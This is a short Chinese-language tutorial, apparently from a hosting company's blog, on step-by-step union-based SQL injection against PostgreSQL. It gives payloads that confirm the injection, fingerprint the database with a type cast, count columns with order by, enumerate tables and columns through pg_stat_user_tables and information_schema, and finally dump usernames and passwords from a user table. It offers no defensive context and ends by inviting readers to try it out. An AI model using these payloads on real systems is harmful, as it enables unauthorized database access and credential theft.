postgreasql數(shù)據(jù)庫注入的過程

本篇內(nèi)容主要講解“postgreasql數(shù)據(jù)庫注入的過程”，感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷，實(shí)用性強(qiáng)。下面就讓小編來帶大家學(xué)習(xí)“postgreasql數(shù)據(jù)庫注入的過程”吧!

一、判斷是否存在注入

and 1=2 返回錯(cuò)誤

and 1=1 返回正常，存在注入

and 1::int=1 返回正常說明是postgresql數(shù)據(jù)庫

二、判斷字段數(shù)量

order by 5 返回錯(cuò)誤

order by 4 返回正常說明，有四列

三、聯(lián)合查詢

union select '1','2','3','4' 可以看出2/3號(hào)位置顯示

四、獲取當(dāng)前數(shù)據(jù)庫

union select '1',current_database(),'3','4'

五、獲取第一個(gè)表

union select '1',relname,'3','4' from  pg_stat_user_tables limit 1 offset 0

獲取第二個(gè)表

union select '1',relname,relname,'4' from  pg_stat_user_tables limit 1 offset 1

六、獲取第一個(gè)字段

union select '1',column_name,'3','4' from information_schema.columns where table_name='reg_users' limit 1 offset 0

獲取第二個(gè)字段

union select '1',column_name,'3','4' from information_schema.columns where table_name='reg_users' limit 1 offset 1

七、獲取字段內(nèi)容

union select '1',''||name||','||password||'','3','4' from  reg_users

到此，相信大家對(duì)“postgreasql數(shù)據(jù)庫注入的過程”有了更深的了解，不妨來實(shí)際操作一番吧！這里是億速云網(wǎng)站，更多相關(guān)內(nèi)容可以進(jìn)入相關(guān)頻道進(jìn)行查詢，關(guān)注我們，繼續(xù)學(xué)習(xí)！